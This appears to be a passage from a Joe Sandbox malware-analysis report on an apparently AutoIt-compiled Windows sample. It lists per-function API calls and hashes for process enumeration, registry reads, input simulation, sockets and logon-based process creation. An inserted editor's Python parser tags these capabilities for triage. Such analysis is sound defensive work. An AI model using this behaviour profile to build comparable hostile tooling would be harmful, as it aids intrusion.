                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: _wcsncpy$LocalTime
                                    • String ID:
                                    • API String ID: 2945705084-0
                                    • Opcode ID: 6d97b6ff4558afb2ee1e3353088e0809f716b662813cb15b622d3edd387ac4c3
                                    • Instruction ID: def2745a575be41be06123f9c5c7bbe99638a9562261d2c3eaff9152b3131566
                                    • Opcode Fuzzy Hash: 6d97b6ff4558afb2ee1e3353088e0809f716b662813cb15b622d3edd387ac4c3
                                    • Instruction Fuzzy Hash: 46417166C1021476DF10EBF8C886BCFB7ACDF86710F50896AE514E3122FA35E61487E6
                                    APIs
                                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 009E8FE7
                                    • GetWindowLongW.USER32(00C89FA0,000000F0), ref: 009E901A
                                    • GetWindowLongW.USER32(00C89FA0,000000F0), ref: 009E904F
                                    • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 009E9081
                                    • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 009E90AB
                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 009E90BC
                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 009E90D6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: LongWindow$MessageSend
                                    • String ID:
                                    • API String ID: 2178440468-0
                                    • Opcode ID: db5a20edd1aad7af8c448ee04840a75167953c9d8a81d0738db6ace3d8a6a6c3
                                    • Instruction ID: d2afda25ed2b9391f047838a2315b16ec9b36f1ff3bd79ec3238ea83f7e3cd20
                                    • Opcode Fuzzy Hash: db5a20edd1aad7af8c448ee04840a75167953c9d8a81d0738db6ace3d8a6a6c3
                                    • Instruction Fuzzy Hash: 4D316479210254EFDB22CF99DC84F6477A9FB8A315F150164F5098B2B2CB72AC42CB40
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009C08F2
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009C0918
                                    • SysAllocString.OLEAUT32(00000000), ref: 009C091B
                                    • SysAllocString.OLEAUT32(?), ref: 009C0939
                                    • SysFreeString.OLEAUT32(?), ref: 009C0942
                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 009C0967
                                    • SysAllocString.OLEAUT32(?), ref: 009C0975
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                    • String ID:
                                    • API String ID: 3761583154-0
                                    • Opcode ID: eb6d2aeafe1b0d7fa4b1b27eee3f9e008a4d95c21fa6321381fc176f82510437
                                    • Instruction ID: 2d3e2d2f08625d4f6f43df9eab478e345f90e8aabb4fba0c731e019f416427c8
                                    • Opcode Fuzzy Hash: eb6d2aeafe1b0d7fa4b1b27eee3f9e008a4d95c21fa6321381fc176f82510437
                                    • Instruction Fuzzy Hash: F2218376A01219AFEF10DFACCC88EBB73ECEB49360B408525F915DB161D674EC468B61
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: __wcsnicmp
                                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                    • API String ID: 1038674560-2734436370
                                    • Opcode ID: 7e7f4e712de6cf89a71945f0871e1a2b358041a722b9f8c455a6349117d3c9eb
                                    • Instruction ID: 0027f18cb83065012bdaf05a8fd9129bf2e34517d8457c2f10c381499f1a84e5
                                    • Opcode Fuzzy Hash: 7e7f4e712de6cf89a71945f0871e1a2b358041a722b9f8c455a6349117d3c9eb
                                    • Instruction Fuzzy Hash: 9D216E7250455177D724B7389C12FBB73ACEFA5310F10442DF44597182E7699941C3E7
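The function records in this report are only as useful as your ability to triage them in bulk. The following is an added example written for this page, not code from Joe Sandbox or from the sample: it parses records in the report's own layout (API bullets with their `ref:` addresses, subcall lines, API ID, String ID and Instruction Fuzzy Hash) and tags each function with the capability its imports imply. The sample text is copied from three records in this report (the keyboard record at 009C3C02, the `__wcsnicmp` record carrying the AutoIt directives, and the Toolhelp32 record at 009E1C18). The Win32 constants and the capability-to-API mapping are the editor's assumptions, not something the report states; the decoding of the `PostMessageW` arguments as WM_KEYDOWN with VK_SHIFT, VK_CONTROL, VK_MENU and VK_LWIN is what makes the 009C3C02 record read as synthetic modifier-key injection (AutoIt's Send() is the usual source of that pattern).

```python
"""Added example: parse this report's per-function records and tag capabilities."""
import re

# Three records copied from this report, in its own layout. The third one is
# cut off in the report, so it also ends without a fuzzy-hash line here.
SAMPLE = """\
APIs
• GetParent.USER32(00000000), ref: 009C3C02
• GetKeyboardState.USER32(?), ref: 009C3C17
• SetKeyboardState.USER32(?), ref: 009C3C78
• PostMessageW.USER32(00000000,00000100,00000010,?), ref: 009C3CA4
• PostMessageW.USER32(00000000,00000100,00000011,?), ref: 009C3CC1
• PostMessageW.USER32(00000000,00000100,00000012,?), ref: 009C3D05
• PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 009C3D26
• API ID: MessagePost$KeyboardState$Parent
• Instruction Fuzzy Hash: B151F6A1E487D53DFB3283648C55FBABE9D6B06300F0CC48CE4D6568C2D695EE84D762
APIs
• API ID: __wcsnicmp
• String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
• Instruction Fuzzy Hash: 9D216E7250455177D724B7389C12FBB73ACEFA5310F10442DF44597182E7699941C3E7
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 009E1C18
• Process32FirstW.KERNEL32(00000000,?), ref: 009E1C26
• __wsplitpath.LIBCMT ref: 009E1C54
  • Part of subcall function 009A1DFC: __wsplitpath_helper.LIBCMT ref: 009A1E3C
• _wcscat.LIBCMT ref: 009E1C69
• Process32NextW.KERNEL32(00000000,?), ref: 009E1CDF
• CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 009E1CF1
"""

# One API bullet: optional "Part of subcall function X:" prefix, Name.MODULE,
# optional (args), then "ref: ADDR". Unresolved arguments appear as "?".
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<parent>[0-9A-F]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)
FIELD_RE = re.compile(r"^\s*•\s*(API ID|String ID|Instruction Fuzzy Hash):\s*(.*)$")
FIELD_KEYS = {"API ID": "api_id", "String ID": "string_id", "Instruction Fuzzy Hash": "fuzzy"}

# Win32 constants, assumed from the SDK headers (not stated by the report).
WM_KEYDOWN = 0x0100
VK_NAMES = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN"}

# Editor's capability mapping for the API names that occur in this report.
CAPABILITIES = {
    "process-enumeration": {"CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW"},
    "keyboard-injection": {"GetKeyboardState", "SetKeyboardState"},
    "shell-execute": {"ShellExecuteExW"},
    "winsock": {"select", "htons", "inet_ntoa", "WSAGetLastError", "__WSAFDIsSet"},
}
AUTOIT_DIRECTIVES = ("#requireadmin", "#notrayicon", "#onautoitstartregister")


def parse_records(text):
    """Split report text into one record per 'APIs' heading."""
    records, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            if cur is not None:
                records.append(cur)
            cur = {"apis": [], "api_id": "", "string_id": "", "fuzzy": ""}
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            raw = m.group("args")
            cur["apis"].append({"name": m.group("name"), "module": m.group("module"),
                                "args": [a.strip() for a in raw.split(",")] if raw else [],
                                "ref": m.group("ref"), "parent": m.group("parent")})
            continue
        f = FIELD_RE.match(line)
        if f:
            cur[FIELD_KEYS[f.group(1)]] = f.group(2).strip()
    if cur is not None:
        records.append(cur)
    return records


def classify(rec):
    """Return capability tags and any synthetic key-down codes for one record."""
    # Subcall lines belong to callees that the report lists separately, so only
    # the function's own calls decide its tags.
    names = {a["name"] for a in rec["apis"] if a["parent"] is None}
    tags = {tag for tag, apis in CAPABILITIES.items() if names & apis}
    keys = []
    for a in rec["apis"]:
        if a["name"] in ("PostMessageW", "SendMessageW") and len(a["args"]) >= 3:
            try:
                msg, wparam = int(a["args"][1], 16), int(a["args"][2], 16)
            except ValueError:  # "?" means the argument was not resolved
                continue
            if msg == WM_KEYDOWN:
                keys.append(VK_NAMES.get(wparam, f"VK_{wparam:02X}"))
    if keys:
        tags.add("synthetic-keydown")
    if any(d in rec["string_id"].lower() for d in AUTOIT_DIRECTIVES):
        tags.add("autoit-directive-parser")
    return {"tags": sorted(tags), "keys": keys}


def report(text):
    """Summarize each record as (first call address, tags, key codes) for triage."""
    out = []
    for rec in parse_records(text):
        label = rec["apis"][0]["ref"] if rec["apis"] else rec["fuzzy"][:16] or "?"
        c = classify(rec)
        out.append((label, c["tags"], c["keys"]))
    return out


if __name__ == "__main__":
    for label, tags, keys in report(SAMPLE):
        print(f"{label:>16}  {', '.join(tags) or '-':<40} {' '.join(keys)}")
```

Feed the whole report text to `report()` to get one line per function; the fuzzy-hash fields stay attached to each record so matches against other Joe Sandbox reports can be cross-referenced by the same hash.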
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009C09CB
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009C09F1
                                    • SysAllocString.OLEAUT32(00000000), ref: 009C09F4
                                    • SysAllocString.OLEAUT32 ref: 009C0A15
                                    • SysFreeString.OLEAUT32 ref: 009C0A1E
                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 009C0A38
                                    • SysAllocString.OLEAUT32(?), ref: 009C0A46
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                    • String ID:
                                    • API String ID: 3761583154-0
                                    • Opcode ID: c771e63648ca8d703ce0ca295b607f75771554f6cb83a271450f0da7aae2d060
                                    • Instruction ID: 2d5488cff8189900c7a3784688dd9daf57b1f43be9896c2ecedb7f8d679356ad
                                    • Opcode Fuzzy Hash: c771e63648ca8d703ce0ca295b607f75771554f6cb83a271450f0da7aae2d060
                                    • Instruction Fuzzy Hash: 6C215676600204AFDB10DFE8DC89EBAB7ECEF48360B40C129F909CB261D674EC468765
                                    APIs
                                      • Part of subcall function 0099D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0099D1BA
                                      • Part of subcall function 0099D17C: GetStockObject.GDI32(00000011), ref: 0099D1CE
                                      • Part of subcall function 0099D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0099D1D8
                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 009EA32D
                                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 009EA33A
                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 009EA345
                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 009EA354
                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 009EA360
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: MessageSend$CreateObjectStockWindow
                                    • String ID: Msctls_Progress32
                                    • API String ID: 1025951953-3636473452
                                    • Opcode ID: 57da5e55753d5cd196652b673611fb965ce430383a02ffa365bfaff54cf753e7
                                    • Instruction ID: 553966283258533e690741716308d7b58b11a4a2eaab215765eccfec496a2df7
                                    • Opcode Fuzzy Hash: 57da5e55753d5cd196652b673611fb965ce430383a02ffa365bfaff54cf753e7
                                    • Instruction Fuzzy Hash: DE1193B115011DBEEF159FA5CC85EE77F6DFF09798F014115BA04A6060C672AC22DBA4
                                    APIs
                                    • GetClientRect.USER32(?,?), ref: 0099CCF6
                                    • GetWindowRect.USER32(?,?), ref: 0099CD37
                                    • ScreenToClient.USER32(?,?), ref: 0099CD5F
                                    • GetClientRect.USER32(?,?), ref: 0099CE8C
                                    • GetWindowRect.USER32(?,?), ref: 0099CEA5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Rect$Client$Window$Screen
                                    • String ID:
                                    • API String ID: 1296646539-0
                                    • Opcode ID: 4fe51f2d18c78631ec1babb1004b06239257c12cd1d46eae45104b0023c915fa
                                    • Instruction ID: 114bfdf062bfa95b7fa75f094b20811667b2f487f1daebcaf61e43907060ccb7
                                    • Opcode Fuzzy Hash: 4fe51f2d18c78631ec1babb1004b06239257c12cd1d46eae45104b0023c915fa
                                    • Instruction Fuzzy Hash: D5B14BB9A00249DBDF10CFA8C8807EDB7B5FF08350F149529ED5AAB254DB34AD51CB64
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 009E1C18
                                    • Process32FirstW.KERNEL32(00000000,?), ref: 009E1C26
                                    • __wsplitpath.LIBCMT ref: 009E1C54
                                      • Part of subcall function 009A1DFC: __wsplitpath_helper.LIBCMT ref: 009A1E3C
                                    • _wcscat.LIBCMT ref: 009E1C69
                                    • Process32NextW.KERNEL32(00000000,?), ref: 009E1CDF
                                    • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 009E1CF1
                                    Similarity
                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                    • String ID:
                                    • API String ID: 1380811348-0
                                    • Opcode ID: 7bd9d1400dedf237594bd0390b0b8ceb4c5c51728b501939481b50df8db85da7
                                    • Instruction ID: 61e4628414fef761a4c7e737a2ad7834bfedcb1fc59b233c5e67ab3d39ce59d2
                                    • Opcode Fuzzy Hash: 7bd9d1400dedf237594bd0390b0b8ceb4c5c51728b501939481b50df8db85da7
                                    • Instruction Fuzzy Hash: 30513BB25043449FD721EF64C885FABB7ECAF88754F00491EF58696291EB70A905CBA2
                                    APIs
                                      • Part of subcall function 009E3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,009E2BB5,?,?), ref: 009E3C1D
                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009E30AF
                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 009E30EF
                                    • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 009E3112
                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 009E313B
                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 009E317E
                                    • RegCloseKey.ADVAPI32(00000000), ref: 009E318B
                                    Similarity
                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                    • String ID:
                                    • API String ID: 3451389628-0
                                    • Opcode ID: 72386157cdff07e47c4867b12cd6c92ea8be7703d3cf1fb0ad2dfefcc208fd4f
                                    • Instruction ID: 61443ea71a3ad0b903f8f64875b828be4b9f67dcc14a841172bb729e6e3f3e3a
                                    • Opcode Fuzzy Hash: 72386157cdff07e47c4867b12cd6c92ea8be7703d3cf1fb0ad2dfefcc208fd4f
                                    • Instruction Fuzzy Hash: 12516872608344AFC705EF65C895E6ABBE9FF88304F04891DF556872A1DB31EA05CB52
                                    APIs
                                    • GetMenu.USER32(?), ref: 009E8540
                                    • GetMenuItemCount.USER32(00000000), ref: 009E8577
                                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 009E859F
                                    • GetMenuItemID.USER32(?,?), ref: 009E860E
                                    • GetSubMenu.USER32(?,?), ref: 009E861C
                                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 009E866D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Menu$Item$CountMessagePostString
                                    • String ID:
                                    • API String ID: 650687236-0
                                    • Opcode ID: f9f72c4b93c5b8ac38befda20392fd964860a1803e00a488e36564cd948e0fb3
                                    • Instruction ID: 0abe8db058dc3f7b1a948fc969f760f68ddfb33a225f2c78875f44994407978f
                                    • Opcode Fuzzy Hash: f9f72c4b93c5b8ac38befda20392fd964860a1803e00a488e36564cd948e0fb3
                                    • Instruction Fuzzy Hash: 79518D71A00219AFCF12EF95C945AAEB7F4FF88710F104499E91ABB351DF30AE418B91
                                    APIs
                                    • _memset.LIBCMT ref: 009C4B10
                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009C4B5B
                                    • IsMenu.USER32(00000000), ref: 009C4B7B
                                    • CreatePopupMenu.USER32 ref: 009C4BAF
                                    • GetMenuItemCount.USER32(000000FF), ref: 009C4C0D
                                    • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 009C4C3E
                                    Similarity
                                    • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                    • String ID:
                                    • API String ID: 3311875123-0
                                    • Opcode ID: 847d6b7f9f409a694ec21c6d4ec2ec11e45403eb2f1ce318875ec28991f43d2a
                                    • Instruction ID: 05c2b6f1a5b1448c8f151f11cc48d50b9106bb51ae4758cf84c9c2e67d2a73b4
                                    • Opcode Fuzzy Hash: 847d6b7f9f409a694ec21c6d4ec2ec11e45403eb2f1ce318875ec28991f43d2a
                                    • Instruction Fuzzy Hash: 02519B70F01209EBDF20CFA8D898FEDBBF8AF45318F14415DE8959A2A1D3719945CB52
                                    APIs
                                    • select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,00A1DC00), ref: 009D8E7C
                                    • WSAGetLastError.WSOCK32(00000000), ref: 009D8E89
                                    • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 009D8EAD
                                    • 733F1E40.WSOCK32(?,?,00000000,00000000), ref: 009D8EC5
                                    • _strlen.LIBCMT ref: 009D8EF7
                                    • WSAGetLastError.WSOCK32(00000000), ref: 009D8F6A
                                    Similarity
                                    • API ID: ErrorLast$_strlenselect
                                    • String ID:
                                    • API String ID: 2217125717-0
                                    • Opcode ID: 6c5c99ccb3dd5e4c31ed24afbe77a1fd5c50f92d5260e3a5e3e56329afc00d21
                                    • Instruction ID: ca21a60831975bf5313ca849c2084f2b2b334e1522d976edfe85ba491a1d6259
                                    • Opcode Fuzzy Hash: 6c5c99ccb3dd5e4c31ed24afbe77a1fd5c50f92d5260e3a5e3e56329afc00d21
                                    • Instruction Fuzzy Hash: 96417371500104ABCB14EBA8CD95FAEB7BDAF98314F10855AF516973D2DF34AE40CB60
                                    APIs
                                      • Part of subcall function 0099B34E: GetWindowLongW.USER32(?,000000EB), ref: 0099B35F
                                    • BeginPaint.USER32(?,?,?), ref: 0099AC2A
                                    • GetWindowRect.USER32(?,?), ref: 0099AC8E
                                    • ScreenToClient.USER32(?,?), ref: 0099ACAB
                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0099ACBC
                                    • EndPaint.USER32(?,?,?,?,?), ref: 0099AD06
                                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 009FE673
                                    Similarity
                                    • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                    • String ID:
                                    • API String ID: 2592858361-0
                                    • Opcode ID: fba75e83aca8dabda95d414ea9e77c3b5314e8e5c8a788febee6be01803d1de6
                                    • Instruction ID: 0886309d1186d4775d75128a2e825c86dc7fdc367c65b1977dd65da5a6b06a30
                                    • Opcode Fuzzy Hash: fba75e83aca8dabda95d414ea9e77c3b5314e8e5c8a788febee6be01803d1de6
                                    • Instruction Fuzzy Hash: 4D41B6751043049FCB11DF58DC84F767BE8EB99320F140669FA94872A1D7359C86DBA2
                                    APIs
                                    • ShowWindow.USER32(00A41628,00000000,00A41628,00000000,00000000,00A41628,?,009FDC5D,00000000,?,00000000,00000000,00000000,?,009FDAD1,00000004), ref: 009EE40B
                                    • EnableWindow.USER32(00000000,00000000), ref: 009EE42F
                                    • ShowWindow.USER32(00A41628,00000000), ref: 009EE48F
                                    • ShowWindow.USER32(00000000,00000004), ref: 009EE4A1
                                    • EnableWindow.USER32(00000000,00000001), ref: 009EE4C5
                                    • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 009EE4E8
                                    Similarity
                                    • API ID: Window$Show$Enable$MessageSend
                                    • String ID:
                                    • API String ID: 642888154-0
                                    • Opcode ID: 40d6f92d899a93c496a1d1a5db9f7d9344110e2254964dd231f86c2757dd8e81
                                    • Instruction ID: 0a40cb1a447b16a64ab2d2910818d05c69cca61b99a557c17aab19906d598902
                                    • Opcode Fuzzy Hash: 40d6f92d899a93c496a1d1a5db9f7d9344110e2254964dd231f86c2757dd8e81
                                    • Instruction Fuzzy Hash: F2415B31601584EFEB23CF69C499B947BE5BF09304F1881A9EA588F2F2D731AC42CB51
                                    APIs
                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 009C98D1
                                      • Part of subcall function 0099F4EA: std::exception::exception.LIBCMT ref: 0099F51E
                                      • Part of subcall function 0099F4EA: __CxxThrowException@8.LIBCMT ref: 0099F533
                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 009C9908
                                    • RtlEnterCriticalSection.KERNEL32(?), ref: 009C9924
                                    • RtlLeaveCriticalSection.KERNEL32(?), ref: 009C999E
                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 009C99B3
                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 009C99D2
                                    Similarity
                                    • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
                                    • String ID:
                                    • API String ID: 2537439066-0
                                    • Opcode ID: 311eaf997a1ccda41cf67f6f2d7dcff3ff29a018d113bbad3e60a3293bd22a6c
                                    • Instruction ID: be623eac38007b64a66ecca8166888bc8fae424c3785fb8de3b1484160dd1f93
                                    • Opcode Fuzzy Hash: 311eaf997a1ccda41cf67f6f2d7dcff3ff29a018d113bbad3e60a3293bd22a6c
                                    • Instruction Fuzzy Hash: C4315232A00105EBDF10DF99DC89EAAB778FF84310B148069F905EB256D770DE11DBA1
                                    APIs
                                    • GetForegroundWindow.USER32(?,?,?,?,?,?,009D77F4,?,?,00000000,00000001), ref: 009D9B53
                                      • Part of subcall function 009D6544: GetWindowRect.USER32(?,?), ref: 009D6557
                                    • GetDesktopWindow.USER32 ref: 009D9B7D
                                    • GetWindowRect.USER32(00000000), ref: 009D9B84
                                    • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 009D9BB6
                                      • Part of subcall function 009C7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 009C7AD0
                                    • GetCursorPos.USER32(?), ref: 009D9BE2
                                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 009D9C44
                                    Similarity
                                    • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                    • String ID:
                                    • API String ID: 4137160315-0
                                    • Opcode ID: 5e10e339937f35bc9a366f441c6ce39a127b3a2614fc8e120a7b6cde4f8f0155
                                    • Instruction ID: 159e8e4f0c521be7221f9a4fe51d806e738fb9e800fd7044d20199d124268ded
                                    • Opcode Fuzzy Hash: 5e10e339937f35bc9a366f441c6ce39a127b3a2614fc8e120a7b6cde4f8f0155
                                    • Instruction Fuzzy Hash: 2231BE72544309ABD710DFA89C49F9AB7EDFF88314F00091AF585A7281D671E909CB92
                                    APIs
                                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 009BAFAE
                                    • OpenProcessToken.ADVAPI32(00000000), ref: 009BAFB5
                                    • 74747ED0.USERENV(?,00000004,00000001), ref: 009BAFC4
                                    • CloseHandle.KERNEL32(00000004), ref: 009BAFCF
                                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 009BAFFE
                                    • 74747F30.USERENV(00000000), ref: 009BB012
                                    Similarity
                                    • API ID: Process$74747$CloseCreateCurrentHandleLogonOpenTokenWith
                                    • String ID:
                                    • API String ID: 1083966619-0
                                    • Opcode ID: 9c2adadf36fff9b525ec85eaac640d710fbe47d08e26bf7032ca87ac64ac1f9b
                                    • Instruction ID: 4666ea247d000c790ea7a911ab5e13c9047b7df0867277ec70b734c502bf71bf
                                    • Opcode Fuzzy Hash: 9c2adadf36fff9b525ec85eaac640d710fbe47d08e26bf7032ca87ac64ac1f9b
                                    • Instruction Fuzzy Hash: 9E2149B210420DABDB02DFE4DE09BEE7BA9AB44324F044015FA01A6161C376DD22EB61
                                    APIs
